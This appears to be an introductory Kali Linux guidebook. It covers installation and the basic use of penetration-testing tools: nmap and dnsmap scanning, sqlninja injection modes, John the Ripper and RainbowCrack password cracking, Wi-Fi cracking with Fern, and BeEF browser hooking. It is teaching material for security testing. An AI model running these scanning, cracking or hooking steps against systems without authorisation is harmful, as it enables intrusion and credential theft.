Instant Kali Linux 


Welcome to Instant Kali Linux. This book is written to provide you with all the 
information that you need to set up and get started with Kali Linux. You will 
learn the basics of Kali, its directory structure, how to work with its popular 
tools, and so on. 


The document contains the following sections: 


So what is Kali Linux? introduces us to Kali, a Linux-based operating system 
specifically designed for penetration testing and computer forensics. It is a 
collection of open source software used by professionals and experts in 
real-life pen-testing scenarios. 


Installation helps us to learn how to download and install Kali Linux with 
minimal fuss and how to set up our own pen-testing lab. 


Quick start — getting your tools right shows us how to perform different tasks 
using the different software tools that are available in Kali. We will also cover 
some topics that are essential to start the journey of pen-testing using 
Kali Linux. 


Top 5 features you'll want to know about will help you learn how to perform 
different tasks with the most important features of Kali Linux. By the end 
of this section, you will be able to use Kali's tools to do the following: 

+ Scanning and gathering information using Nmap 
+ Breaking wireless networks using Aircrack 
+ Pen-testing web applications using Burp Suite 
+ Getting started with the Metasploit Exploitation Framework 
+ Performing automated SQL injection attacks using sqlmap 
+ Performing digital forensics using Kali Linux 


People and places you should get to know provides you with many useful links to 
project pages and forums, as well as a number of helpful articles, tutorials, and 
blogs. It also gives links to the Twitter feeds of Kali Linux super contributors and 
open source hackers. 
So, what is Kali Linux? 


Before we get into Kali Linux, we need to understand what penetration testing is. Penetration 
testing or pen-testing is the method of evaluating the security implementations of a computer 
system or a network of computers. The idea behind penetration testing is to target the 
computer(s) with a specific set of attack vectors to figure out whether it is able to withstand 
those attacks without malfunctioning. The different attack vectors in pen-testing can include 
identifying and exploiting the known vulnerabilities in various application software and 
operating systems, assessing the strength of connecting networks, providing assessment 
reports, and so on. Penetration testing has its own field of study within computer science. 


When it comes to penetration testing, Kali Linux is the most preferred operating system for 
professionals. Kali is an advanced Linux-based operating system, a collection of open source 
software that is used to perform different tasks within penetration testing, computer forensics, 
and security audits. Some of its key features include the following: 

+ Kali Linux contains over 300 penetration testing and assessment tools 
+ Kali supports a variety of additional hardware such as wireless receivers 
and PCI hardware 
+ It provides a full-fledged development environment in C, Python, and Ruby 
+ It is customizable and open source 


Kali comes as a downloadable ISO that can either be used as a live or a standalone operating 
system. Let us move ahead and see how we can set up your penetration testing lab using Kali. 
Installation 


To begin the installation, we need to download Kali Linux. Kali Linux is available in the 
following formats: 


+ ISO files based on system architecture (x86 and x64) 
+ VMware images 
+ ARM images 


Kali can be either installed as a dual boot with your existing operating system, or it can be 
set up as a virtual machine. Let us begin the process of dual boot installation first. In three 
easy steps, you can install Kali Linux on your system as a dual boot option. 


Step 1 — download and boot 


Before you install Kali, you will need to check whether you have all of the following 
required elements: 


+ Minimum 12 GB of hard disk space 
+ At least 1 GB RAM for optimum performance 
+ Bootable device such as an optical drive or USB 


Once you have checked the requirements, you can download a bootable ISO from its official 
website, http://www.kali.org/downloads. 


You will optionally be asked to register with your name and e-mail. The download page will 
have a few options to select from, such as the window manager and system architecture. 
Choose the values as per your system requirements (architecture and so on). 


[Screenshot: the Kali Linux download page (kali.org/downloads, "Download your flavour of Kali Linux"), with selectors for architecture (i386), mirror (official), window manager (Gnome), image type (ISO) and download method (Direct), followed by the chosen ISO filename, its SHA1 checksum 54af51b9f4bf3d77ecd45e548de308837c546012, and the Download Kali button.] 

Compare the published checksum against the downloaded file (for example with sha1sum) before you boot from the image, so that a corrupted or tampered download is caught early. 
Once the download is complete, we will have to burn it to a disk or USB. The disk/USB should be 
made bootable so that the system can load the setup from it. 


Step 2 — setting up the dual boot 


Once our bootable media are ready, we are set to restart the system and boot from our disk/USB. 
We will be greeted with a screen similar to the following: 


[Screenshot: the Kali boot menu with the entries Live (686-pae), Live (686-pae failsafe), Live (forensic mode), Install, Graphical install and Advanced options, and the prompt "Press ENTER to boot or TAB to edit a menu entry".] 





We will begin by selecting the Live boot option. The operating system will start loading and, 
within a few minutes, we will have our first look at the Kali desktop. 


Once the desktop is loaded, navigate to Applications | System Tools | Administration | GParted Partition editor. 


This will present a GUI representation of the partition of your current operating system. Carefully 
resize it to leave enough space (12 GB minimum) for the Kali installation. 


Once the partition has been resized on the hard disk, ensure you select the Apply All Operations 
option. Exit GParted and reboot Kali Linux. 
Step 3 — beginning with the installation 

Once we are back at the home screen, select Graphical install. The initial few screens of the 
installation will ask you for language selection, location selection, keyboard, and so on. We need 
to be careful while setting up the root password: the default root password for Kali (used, for 
example, by the live image) is toor, so choose a strong password of your own here. 


Dual boot only 

Once we are through with this, the next important step is selecting the partition to install 
the operating system to. We will have to use the same unallocated space that we created 
moments ago using GParted. 





Once the partition is selected, Kali will take over and install the operating system. The process 
will take some time to complete. After the installation is complete, the system startup screen 
will give you the option to boot either into Kali Linux or into the other operating system, which is 
called a dual boot configuration. 


Installing Kali as a virtual machine 


Setting up Kali over virtualization software is easy. Kali officially provides a VMware image that 
can be downloaded from its official website (http://www.kali.org/downloads). It can be 
imported into VMware Player, after which it is ready to run. 


To set up Kali Linux using VirtualBox, we will need the same ISO file downloaded earlier and a 
recent installation of VirtualBox. 


To begin installing, create a new virtual machine and set up the required hard disk space and RAM. 


[Screenshot: the VirtualBox "Name and operating system" dialog ("Please choose a descriptive name for the new virtual machine and select the type of operating system you intend to install on it. The name you choose will be used throughout VirtualBox to identify this machine."), with Name set to Kali_linux and Type set to Linux.] 
Once the machine is created, start it. The first start will prompt us to select a disk. Select the Kali 
ISO and start the installation. The remaining steps are the same as the dual boot installation. 


Once the installation is complete and desktop is loaded, we can install the VirtualBox guest 
additions. Follow these steps to install the guest additions: 


1. Copy the file to the following location: 

cp /media/cd-rom/VBoxLinuxAdditions.run /root/ 

2. Set the file permission as follows: 

chmod 755 /root/VBoxLinuxAdditions.run 

3. Execute the following commands: 

cd /root 
./VBoxLinuxAdditions.run 


Updating Kali Linux 

Once we are through with the installation process, the final step is to update the OS with 
the latest patches and releases. This ensures that we are working with the latest packages. 
To update the operating system, launch the terminal and pass the following command to it: 

apt-get update 

Note that apt-get update only refreshes the package lists; to actually install the newer 
packages, follow it with apt-get upgrade. 


And that's it 


By this point, you should have a working installation of Kali Linux and are free to play around 
and discover more about it. 
Quick start — getting your tools right 


Let us dive deep into the world of Kali Linux and understand the basic functionalities of some 
of its most popular tools. We will begin by looking at the directory structure used by Kali. 


Understanding the memory layout 


Kali follows a directory structure that is similar to Ubuntu-based Linux. Some of the important 
locations to look for include the following: 


+ /etc/: Contains configuration files of the installed tools 
+ /opt/: Contains Metasploit and its relevant modules 
+ /sys/: Contains configuration files of external hardware and interfaces 
+ /root/: It is the root user directory 
+ /lib/: Contains libraries dependent on the operating system 


[Screenshot: the file manager browsing the root of the file system, with the opt directory selected ("'opt' selected (containing 2 items)").] 


Most of the tools and software used for penetration testing and assessment can be found from 
the Applications menu on the desktop. The list is logically arranged based on the usability of the 
tools. To access them, browse to Applications | Kali Linux. 


Information gathering and sniffing with Kali Linux 


Kali Linux contains an exclusive set of tools that can help in the process of information gathering. 
Nmap (the network port mapper), DNSmap, and Trace are some important tools included. Let us 
cover some of the tools from specific categories. 


DNSmap analysis 


Domain Name System (DNS) is a hierarchically distributed naming system of servers/resources 
connected to the Internet. The domain names are used to access that particular service. For 
example, www.packtpub.com is used to access the HTTP server hosted by Packt Publishing. 
Let us check out the DNSmap tool provided in Kali. 


DNSmap is a tool that is used to discover all the subdomains associated with a given domain. 
Passing the following command at the terminal will show the complete DNS mapping for 
www.rediff.com: 

root@kali:~# dnsmap rediff.com 


[Screenshot: terminal output of dnsmap rediff.com. The readable part reads:] 

dnsmap 0.30 - DNS Network Mapper by pagvac (gnucitizen.org) 

[+] searching (sub)domains for rediff.com using built-in wordlist 
[+] using maximum random delay of 10 millisecond(s) between requests 

The tool then lists each discovered subdomain (a.rediff.com, b.rediff.com, blogs.rediff.com, c.rediff.com, catalog.rediff.com, ...) together with its resolved IP address(es); the addresses are not legible in the scan. 
Network scanners 


Network scanners are used to enumerate a public or a private network and to gain information 
about it. 


Nmap is by far the most popular information-gathering tool. It is a powerful tool that is used 
to scan a computer or a complete network for open ports along with the services running on those 
ports. This information can be useful for professional auditors and pen-testers in order to target 
certain services to compromise the target. Passing the following command will list the various 
scan options available: 

root@kali:~# nmap -h 

A simple UDP scan of a /24 range can be launched using the following command: 

root@kali:~# nmap -sU 192.168.5.0-255 

UDP scans are much slower than TCP scans because open UDP ports usually do not answer, so 
Nmap has to wait for timeouts and retries before classifying a port. 
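As an added example (not from the book), here is a small Python script that reads Nmap's grepable output (the format produced by nmap -oG) and flags open ports that are not on an allowlist of expected services; the scan output and the allowlist are constructed sample data. A defender can run the same logic over real -oG files to spot services that should not be exposed.

```python
import re

# Constructed sample of Nmap grepable output (what `nmap -oG -` prints);
# not a real scan. Fields within a "Host:" line are separated by tabs.
SAMPLE_GNMAP = """\
# Nmap 6.25 scan initiated as: nmap -sS -sU -sV -oG - 192.168.5.10-11
Host: 192.168.5.10 ()\tStatus: Up
Host: 192.168.5.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.0p1/, 80/open/tcp//http//Apache httpd 2.2.22/, 3306/open/tcp//mysql//MySQL 5.5/\tIgnored State: closed (997)
Host: 192.168.5.11 ()\tStatus: Up
Host: 192.168.5.11 ()\tPorts: 53/open|filtered/udp//domain///, 161/open/udp//snmp//SNMPv1 server/\tIgnored State: open|filtered (998)
# Nmap done: 2 IP addresses (2 hosts up) scanned
"""

# Constructed allowlist: the (protocol, port) pairs each host is supposed to expose.
EXPECTED = {
    "192.168.5.10": {("tcp", 22), ("tcp", 80)},
    "192.168.5.11": {("udp", 53)},
}

# Each port entry has the shape port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/([^/]*)/(tcp|udp)/[^/]*/([^/]*)/[^/]*/([^/]*)/")


def parse_gnmap(text):
    """Return {host: [(proto, port, state, service, version), ...]}."""
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        host = line.split()[1]
        # Tab-separated "Key: value" fields (Status, Ports, Ignored State, ...)
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        ports = results.setdefault(host, [])
        for port, state, proto, service, version in PORT_RE.findall(fields.get("Ports", "")):
            ports.append((proto, int(port), state, service, version))
    return results


def unexpected_open_ports(results, expected):
    """Ports in an open state (including open|filtered) that the allowlist does not cover."""
    findings = []
    for host, ports in results.items():
        allowed = expected.get(host, set())
        for proto, port, state, service, version in ports:
            if state.startswith("open") and (proto, port) not in allowed:
                findings.append((host, proto, port, service, version))
    return sorted(findings)


if __name__ == "__main__":
    for host, proto, port, service, version in unexpected_open_ports(
            parse_gnmap(SAMPLE_GNMAP), EXPECTED):
        print(f"{host}: unexpected {proto}/{port} ({service} {version})".rstrip())
```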


Detecting live hosts 

Fping is a popular tool used to identify whether a given host is connected to a network or not: 

root@kali:~# fping google.com 
google.com is alive 


SSL analysis 


SSLScan is a fast SSL port scanner that connects to the SSL port, determines which ciphers and 
SSL protocols are supported, and returns the SSL certificate. 


Network sniffing 


Dsniff is a collection of tools that can perform a wide variety of sniffing tasks. These tools work 
by passively monitoring the network traffic for interesting data such as passwords, key transfers, 
and e-mails. Some of the tools in this suite include urlsnarf, WebSpy, mailsnarf, and so on. 


Netsniff is a fast and robust networking toolkit specifically designed for Linux platforms. It can 
be used for network development analysis, debugging, auditing, and so on. netsniff-ng is a fast 
network analyzer based on the packet mmap(2) mechanism. It can record .pcap files to disk, 
replay them, and also perform offline and online analysis. 
Working with vulnerability assessment tools 


Vulnerability assessment tools play a very important role in penetration testing. These tools 
help a pen-tester in analyzing vulnerabilities and weaknesses in the current system. Vulnerability 
assessment can be performed over a variety of services and software based on the requirement. 
OpenVAS is an open source vulnerability-scanning framework specifically designed to dig out 
vulnerabilities under various scenarios. 


To start working with OpenVAS, browse to Applications | Kali Linux | Vulnerability Analysis | 
OpenVAS. 


If you are starting it for the first time, run openvas-setup to update the software and start 
all of the required plugins and dependencies. 


[Screenshot: terminal output of openvas-setup. The readable part shows the NVT synchronisation: "This script synchronizes an NVT collection with the 'OpenVAS NVT Feed'", the NVT directory /var/lib/openvas/plugins, the rsync feed rsync://feed.openvas.org:/nvt-feed, the feed server notice ("All transactions are logged. Please report problems to admin@intevation.de") and the incremental file list being received (COPYING, COPYING.GPLv2, COPYING.files, DDI_Directory_Scanner.nasl, ...).] 





The next step will be to add a new user to OpenVAS. Pass the following command to 
the terminal: 

root@kali:~# openvas-adduser 

You can skip the rule creation process by pressing Ctrl + D. We can use the following command 
to regularly update the framework with new signatures and dependencies: 

root@kali:~# openvas-nvt-sync 
Now, we are all set to load the framework and begin our assessment task. Browse to Applications 
| Kali Linux | Vulnerability Analysis | OpenVAS | openvas-gsd. This will launch the GUI framework 
and prompt for the login details. Enter the credentials that you set up earlier and provide the local 
server address. 


[Screenshot: the openvas-gsd (Greenbone Security Desktop) login dialog. The Profile is "default"; the Server address is 127.0.0.1, Port 9390, protocol OMP 3.0; the Username is root, with a Password field. The help text notes that the scan engine must have OMP support enabled on the given port for a successful connection, and that the access profile can be saved before logging in.] 
After logging in, you can begin your scanning process. To get started with your first scan, 
navigate to Task | New. Fill in a task name and the required scan mode as shown in the 
following screenshot: 


[Screenshot: the New Task dialog with the fields Name, Comment (optional), Scan Config (Full and fast), Scan Targets (Localhost), Escalator (optional), Schedule (optional) and Slave (optional), plus Cancel and Create buttons.] 





Once the task is created, you will notice that the task is listed at the bottom part of the interface. 
Click on the Start button to begin scanning. 


Web app penetration testing in Kali 


Web apps are now a major part of today's World Wide Web, and keeping them safe and secure is the 
prime focus of webmasters. Building web apps from scratch can be a tedious task, and small bugs 
in the code can lead to a security breach. This is where web app penetration testing tools come in 
and help you secure your application. Web app penetration testing can be performed on various 
fronts such as the frontend interface, the database, and the web server. Let us leverage the power of 
some of the important tools in Kali that can be helpful during web app penetration testing. 
WebScarab proxy 


WebScarab is an HTTP and HTTPS proxy interceptor framework that allows the user to review 
and modify the requests created by the browser before they are sent to the server. Similarly, 
the responses received from the server can be modified before they are reflected in the browser. 
The new version of WebScarab has many more advanced features such as XSS/CSRF detection, 
session ID analysis, and fuzzing. Follow these three steps to get started with WebScarab: 

1. To launch WebScarab, browse to Applications | Kali Linux | Web applications | Web 
application proxies | WebScarab. 

2. Once the application is loaded, you will have to change your browser's network 
settings. Set the proxy settings for IP as 127.0.0.1 and Port as 8008: 


[Screenshot: the browser's Connection Settings dialog ("Configure Proxies to Access the Internet") with "Manual proxy configuration" selected and HTTP Proxy set to 127.0.0.1, Port 8008; the SSL, FTP and SOCKS proxy fields are empty, with SOCKS v5 selected.] 
3. Save the settings and go back to the WebScarab GUI. Click on the Proxy tab and check 
Intercept requests. Make sure that both GET and POST requests are highlighted in 
the left-hand side panel. To intercept the responses, check Intercept responses to begin 
reviewing the responses coming from the server. 


[Screenshot: the WebScarab Proxy tab (Listeners / Manual Edit / Bean Shell / Miscellaneous sub-tabs). "Intercept requests" is checked; GET and POST are highlighted in the Methods list (which also offers HEAD, PUT, DELETE, TRACE, PROPFIND, OPTIONS, PROPPATCH, MKCOL, COPY, MOVE and LOCK); "Exclude paths matching" holds a regular expression that skips static content such as css, js, ico, swf and axd files; "Intercept responses" is limited to MIME types matching text/.*.] 





Attacking the database using sqlninja 


sqlninja is a popular tool used to test for SQL injection vulnerabilities in Microsoft SQL 
Server. Databases are an integral part of web apps; hence, even a single flaw in one can 
lead to mass compromise of information. Let us see how sqlninja can be used for 
database penetration testing. 

To launch sqlninja, browse to Applications | Kali Linux | Web applications | Database 
Exploitation | sqlninja. 

This will launch a terminal window showing the sqlninja parameters. The important parameter 
to look for is the mode parameter, -m: 


[Screenshot: the sqlninja usage banner (rel. 0.2.6-r1, Copyright (C) 2006-2011 icesurfer). Usage: /usr/bin/sqlninja -m <mode>, where <mode> is one of test (test whether the injection is working), fingerprint (fingerprint user, xp_cmdshell and more), bruteforce (bruteforce sa account), escalation (add user to sysadmin server role), resurrectxp (try to recreate xp_cmdshell), upload (upload a .scr file), dirshell (start a direct shell), backscan (look for an open outbound port), revshell (start a reverse shell), dnstunnel (attempt a dns tunneled shell), icmpshell (start a reverse ICMP shell), sqlcmd (issue a 'blind' OS command) and metasploit (wrapper to Metasploit stagers). Further options select the configuration file (default: sqlninja.conf), the sa password, the wordlist for bruteforce mode (dictionary method only), debug-script generation (upload mode only), verbose output and debug mode.] 





The -m parameter specifies the type of operation we want to perform over the target database. 
Let us pass a basic command and analyze the output: 


root@kali:~# sqlninja -m test 
Sqlninja rel. 0.2.3-r1 
Copyright (C) 2006-2008 icesurfer 

[-] sqlninja.conf does not exist. You want to create it now ? [y/n] 


This will prompt you to set up your configuration file (sqlninja.conf). You can pass the 
respective values and create the config file. Once you are through with it, you are ready to 
perform database penetration testing. 


The Websploit framework 


Websploit is an open source framework designed for vulnerability analysis and penetration 
testing of web applications. It is very much similar to Metasploit and incorporates many of 
its plugins to add functionalities. 
To launch Websploit, browse to Applications | Kali Linux | Web Applications | Web Application 
Fuzzers | Websploit. 


[Screenshot: the Websploit Framework banner in the terminal, showing Version, Codename, Available Modules and Update Date.] 





We can begin by updating the framework. Passing the update command at the terminal will 
begin the updating process as follows: 

wsf > update 
[*] Updating Websploit framework, Please Wait... 

Once the update is over, you can check out the available modules by passing the following 
command: 

wsf > show modules 

Let us launch a simple directory scanner module against www.target.com as follows: 

wsf > use web/dir_scanner 
wsf:Dir_Scanner > show options 
wsf:Dir_Scanner > set TARGET www.target.com 
wsf:Dir_Scanner > run 
[Screenshot: a Websploit session. "show modules" lists modules including Metasploit Autopwn Service, Metasploit Browser Autopwn Service, Java Applet Attack (Using HTML), wifi/wifi_jammer (Wifi Jammer) and wifi/wifi_dos (Wifi Dos Attack); then use web/dir_scanner, show options (Options / Value), set TARGET www.target.com and run, after which the module prints "Loading Path List" and starts its requests.] 





Once the run command is executed, Websploit will launch the attack module and display the 
result. Similarly, we can use other modules based on the requirements of our scenarios. 


Breaking passwords 


Passwords are the most common authentication technique implemented in computer systems. 
Breaking them can provide a direct entry into the system and can give you the desired privilege 
escalation. Kali comes with several tools that can be used to break passwords either offline 
or online. Let us look over some of the important password-cracking tools in Kali and discuss 
their modes of operation. 


John the Ripper 


John the Ripper is a free and fast password cracker that can be effectively used to break weak 
Unix passwords, Windows LM hashes, DES- and Kerberos-based hashes, and many other hash formats. 

John works on password hashes stored in a file. It can crack them by brute force, generating 
candidate passwords on its own, or, alternatively, we can provide a wordlist of passwords that 
John tries against the hashes until a match is found. 

To launch John the Ripper, browse to Applications | Kali Linux | Password Attacks | Offline 
Attacks | John. 
[Screenshot: the John the Ripper help output (ver. 1.7.9-jumbo-7 [Linux-x86-sse2], Copyright (c) 1996-2012 by Solar Designer and others, homepage http://www.openwall.com/john/). Usage: john [OPTIONS] [PASSWORD-FILES]; the listed options include --config=FILE, --single[=SECTION], --wordlist[=FILE] / --stdin, --pipe, --loopback[=FILE], --dupe-suppression, --encoding=NAME (see --list=encodings), --rules[=SECTION] (wordlist modes), --incremental[=MODE], --markov[=OPTIONS], --external=MODE, --stdout[=LENGTH], --restore[=NAME], --session=NAME, --status[=NAME], --make-charset=FILE, --show[=LEFT] and --test[=TIME].] 




To launch a brute force attack against a password file, you can pass the following command: 

root@kali:~# john pwd 

Here pwd is the name of the password file. 

To retrieve the cracked passwords, pass the following command: 

root@kali:~# john --show pwd 

You can also provide a wordlist of stored passwords and apply John's mangling rules to it: 

root@kali:~# john --wordlist=password.lst --rules pwd 


Working with RainbowCrack 


RainbowCrack is a faster password cracking tool than John. RainbowCrack is based on the 
concept of rainbow tables: huge precomputed tables, built from chains of hashes, that cover 
nearly every possible password in a chosen character set and length range. The hash supplied 
by the user is looked up against the rainbow table until a match is found. This technique is proven 
to be more effective and less time-consuming than brute force, at the cost of generating and 
storing the tables in advance. It only works against unsalted hashes: with a per-user salt, the 
same password no longer produces the same hash, so no precomputed table applies. 
To launch RainbowCrack, browse to Applications | Kali Linux | Password Attacks | Offline 
Attacks | RainbowCrack. 


[Screenshot: the rcrack usage output, which reads:] 

RainbowCrack 1.5 
Copyright 2003-2010 RainbowCrack Project. All rights reserved. 
Official Website: http://project-rainbowcrack.com/ 

usage: rcrack rt_files [rt_files ...] -h hash 
       rcrack rt_files [rt_files ...] -l hash_list_file 
       rcrack rt_files [rt_files ...] -f pwdump_file 
       rcrack rt_files [rt_files ...] -n pwdump_file 
rt_files: path to the rainbow table(s), wildchar(*, ?) supported 
-h hash: load single hash 
-l hash_list_file: load hashes from a file, each hash in a line 
-f pwdump_file: load LanManager hashes from pwdump file 
-n pwdump_file: load ntlm hashes from pwdump file 

hash algorithms implemented in alglib0.so: 
lm, plaintext_len limit: 0 - 7 
ntlm, plaintext_len limit: 0 - 15 
md5, plaintext_len limit: 0 - 15 
sha1, plaintext_len limit: 0 - 20 
mysqlsha1, plaintext_len limit: 0 - 20 
halflmchall, plaintext_len limit: 0 - 7 
ntlmchall, plaintext_len limit: 0 - 15 
oracle-SYSTEM, plaintext_len limit: 0 - 16 
md5-half, plaintext_len limit: 0 - 15 





An example command is as follows: 

rcrack *.rt -l hash.txt 

This command launches RainbowCrack and loads every rainbow table matching the wildcard 
(*.rt); the hashes to be cracked are read from the hash.txt file, one per line. 
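To show what a rainbow table actually stores and why rcrack needs unsalted hashes, here is an added toy implementation in Python (written for this page, not RainbowCrack's code) of the hash-chain idea: chains of alternating hash and reduction steps over a tiny password space (four lowercase letters, MD5), a table that keeps only chain end points, and a lookup that walks a chain forward from the target hash. The demo recovers a password the table covers and then shows that the same password hashed with a salt is not found.

```python
import hashlib
from collections import defaultdict

ALPHABET = "abcdefghijklmnopqrstuvwxyz"
PW_LEN = 4                       # toy space: 26**4 = 456,976 passwords
SPACE = len(ALPHABET) ** PW_LEN
CHAIN_LEN = 100                  # hashes covered per chain (t)
NUM_CHAINS = 1000                # chains stored in the table (m)


def H(password):
    """The unsalted hash under attack (MD5, one of the algorithms rcrack lists)."""
    return hashlib.md5(password.encode()).hexdigest()


def _encode(n):
    """Map an integer in [0, SPACE) to a password string."""
    chars = []
    for _ in range(PW_LEN):
        n, r = divmod(n, len(ALPHABET))
        chars.append(ALPHABET[r])
    return "".join(chars)


def R(column, digest):
    """Reduction function: turn a digest back into *some* password. Using a
    different reduction per column is what makes this a 'rainbow' table: chains
    that collide in different columns do not merge into one."""
    return _encode((int(digest[:15], 16) + column) % SPACE)


def build_table():
    """Precompute NUM_CHAINS chains but store only end point -> start points.
    This is the space/time trade-off: t hashes of work become one table entry."""
    table = defaultdict(list)
    for k in range(NUM_CHAINS):
        start = _encode((k * 7919) % SPACE)   # deterministic, spread-out start points
        p = start
        for col in range(CHAIN_LEN):
            p = R(col, H(p))
        table[p].append(start)
    return table


def chain_password(start, column):
    """The password found in `column` of the chain that begins at `start`."""
    p = start
    for c in range(column):
        p = R(c, H(p))
    return p


def lookup(table, target):
    """Return a password whose hash is `target`, or None if the table does not cover it."""
    for col in range(CHAIN_LEN - 1, -1, -1):
        # Hypothesis: target is the hash in column `col` of some chain.
        # Finish that chain from here and see whether its end point is stored.
        p = R(col, target)
        for c in range(col + 1, CHAIN_LEN):
            p = R(c, H(p))
        for start in table.get(p, ()):
            # Regenerate the chain up to `col` and verify; false alarms are common.
            cand = chain_password(start, col)
            if H(cand) == target:
                return cand
    return None


def demo():
    """Crack a covered hash, then show that a salt defeats the same table."""
    table = build_table()
    pw = chain_password(_encode(5 * 7919), 37)     # a password the table covers
    hit = lookup(table, H(pw))
    salted = lookup(table, H("s4lt:" + pw))        # per-user salt prepended
    return pw, hit, salted


if __name__ == "__main__":
    pw, hit, salted = demo()
    print(f"password {pw}: unsalted lookup -> {hit}, salted lookup -> {salted}")
```

A real table is the same structure with millions of much longer chains, which is why the tables are large files and why the plaintext length limits above matter.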


Targeting wireless networks 


Wireless networking is one of the primary means of connecting computers in a network. This creates 
a wide scope for security testing in this domain. The penetration testing we perform on a wireless 
network is similar to that of wired networks; the only difference lies in the way in which devices and 
protocols are connected. Kali comes with many useful tools that can ease the process of testing 
and assessment of wireless networks. Let us have a quick look at some of them. 


Working with Kismet 


Kismet is a wireless network detector/sniffer that can be used to trace the data flowing 
over the wireless communication medium. Kismet identifies networks by passively collecting 
packets and detecting networks, which allows it to detect hidden networks and the presence 
of non-beaconing networks via data traffic. 
Kismet can be launched from Applications | Kali Linux | Wireless Attacks | Wireless tools | 
Kismet. 


[Screenshot: the kismet_server help output. Usage: /usr/bin/kismet_server [OPTION]; nearly all options are run-time overrides for values in the kismet.conf configuration file, and permanent changes should be made there. Generic options: -v/--version, -f/--config-file <file>, --no-line-wrap, -s/--silent, --daemonize, --no-plugins and --no-root (do not start the capture binary when not running as root; for no-priv remote capture only). Client/server options: -l/--server-listen. Remote drone options: --drone-listen. Dump/logging options follow.] 





Once the terminal is loaded, type kismet and press Enter. You will be greeted with an introductory 
screen. Answer the questions to launch the server. If you are running it for the first time, it will ask 
you to select an interface. 


[Screenshot: the Kismet client's first-run dialog: "Some terminals don't display some colors (notably, dark grey) correctly. The next line of text should read 'Dark grey text': Is it visible? If you answer 'No', dark grey will not be used in the default color scheme. Remember, you can always change colors to your taste by going to Kismet->Preferences->Colors." with [ No ] and [ Yes ] buttons. Behind it the client reports "Could not connect to Kismet server 'localhost:2501' (Connection refused), will attempt to reconnect in 5 seconds" until the server is up.] 
Add your wireless interface (wlan0 by default) and select Add as shown in the following 
screenshot: 


[Screenshot: the Kismet "Add Source" dialog shown over the server log. The log reports "Indexing manufacturer db", "Completed indexing manufacturer db, 21650 lines 433 indexes", "Creating network tracker...", reading the config file under /root/.kismet, "INFO: Kismet starting", an INFO line that no packet source is defined yet, and repeated "ERROR: Could not connect to the GPSD server, will reconnect in N seconds" messages.]


Once the interface is added, Kismet will start reporting reachable wireless networks. You can 
select any of them to begin capturing the data flowing over it. 


[Screenshot: the Kismet main view after the source is added. The side panel shows Elapsed 00:03.53 and the Networks, Packets (1963), Pkt/Sec and Filtered counters; the log pane reports detected networks (for example "... encryption yes, channel 11, 54.00 mbit") and "Could not connect to the GPSD server, will reconnect in N seconds".]

This was a quick tutorial on how Kismet can be used to identify wireless networks and passively
sniff the data over them.


Fern WIFI Cracker 


Fern is a GUI-based Wi-Fi auditing tool that is able to crack and recover WEP/WPA/WPS keys and
also run other network-based attacks on wireless or Ethernet-based networks. This tool has been
developed in the Python language. To use Fern, you should have some preinstalled tools such
as Aircrack, Python Scapy, and Reaver. Kali has these tools preinstalled, so you need not worry
about installing them. Some of the important features of Fern include:


+ WEP cracking with Fragmentation, Chop-Chop, Caffe-Latte, Hirte, ARP Request
Replay, or WPS attack

+ WPA/WPA2 cracking with dictionary or WPS-based attacks

+ Automatic saving of the key in the database upon a successful crack

+ Automatic access point attack system

+ Session hijacking (passive and Ethernet modes)

+ Access point MAC address for geolocation tracking


To launch Fern, browse to Applications | Kali Linux | Wireless Attacks | Wireless tools | Fern
WIFI Cracker.

Once the GUI is loaded, select your interface from the drop-down menu. After a few moments,
the GUI will start reflecting nearby Wi-Fi networks categorized by their security type
(WPA, WEP, and so on).


[Screenshot: the Fern WIFI Cracker main window, including the Key Database entry.]


Once the scan settings pop-up appears, click on OK to proceed. After a few moments, the attack
will be launched and any successful crack will be reported by Fern.


Bluetooth auditing 


Kali also provides an option to audit Bluetooth networks. Bluetooth is the most commonly
used way of transferring data between mobile devices and is supported by almost all modern
devices. Hence, auditing Bluetooth can be crucial for network administrators. We will give a
brief introduction to BlueRanger.


BlueRanger 


BlueRanger is a simple Bash script that uses link quality to locate Bluetooth radio devices. 
It sends L2CAP (Bluetooth) pings to create a connection between Bluetooth interfaces since 
most devices allow pings without any authentication or authorization. 
To begin working with BlueRanger, browse to Applications | Kali Linux | Wireless Attacks |
Bluetooth tools | Blueranger.


[Screenshot of the terminal showing BlueRanger's usage text:]

BlueRanger 1.8 by JP Dunning (.ronin)
<www.hackfromacave.com>
(c) 2009-2012 Shadow Cave LLC.

NAME
    blueranger

SYNOPSIS
    blueranger.sh <hciX> <bdaddr>

DESCRIPTION
    <hciX>     Local interface
    <bdaddr>   Remote Device Address


To launch the enumeration of Bluetooth devices, pass the command at the terminal as shown
in the SYNOPSIS of the preceding image. An example command can be:


root@kali:~#blueranger.sh hci0 6C:D4:8A:B0:20:AC 


Once the command is executed, the Bash script will start pinging the devices that are in range. 
The screen will refresh after each ping. It will report the nearby devices, ping count, proximity 
change, range, and so on. 


Exploitation frameworks and tools 


Exploitation frameworks are the heart and soul of penetration testing. They give testers the power
to manage their assessment easily using a single framework. Kali Linux integrates these
frameworks right into its core to make sure they perform in the most optimal way. In this
section, we will cover some of the important exploitation frameworks present in Kali Linux.


Browser Exploitation Framework 


Browser Exploitation Framework (BeEF) is a popular open source framework that is 
particularly designed for auditing web browsers. Launch BeEF via Applications | Kali Linux | 
Exploitation Tools | BeEF Exploitation Framework | BeEF. This will launch the browser with 
the following location: 


http://127.0.0.1:3000/ui/panel


In the next step, you will be asked for authentication. The default username and password are
beef and beef respectively.


Initial versions of Kali do not have BeEF installed. In that case, use the following commands to 
get the latest copy of BeEF: 


root@kali:/# apt-get update 
root@kali:/# apt-get install beef-xss 


Once the install is finished, we can change to its directory and launch BeEF using the following 
commands: 


root@kali:/# cd /usr/share/beef-xss 
root@kali:/# ./beef 


Once the welcome page is loaded, you can start by clicking on the demo link to get the official
getting-started tutorials.


[Screenshot: the BeEF Control Panel (BeEF 0.4.4.1-alpha) in Iceweasel at 127.0.0.1:3000. The Hooked Browsers panel on the left lists Online Browsers and Offline Browsers; the Getting Started page reads:]

Welcome to BeEF!

Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you
can point a browser towards the basic demo page here, or the advanced version here.

After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the
left. Hooked browsers will appear in either an online or offline state, depending on how recently they
have polled the framework.

Hooked Browsers

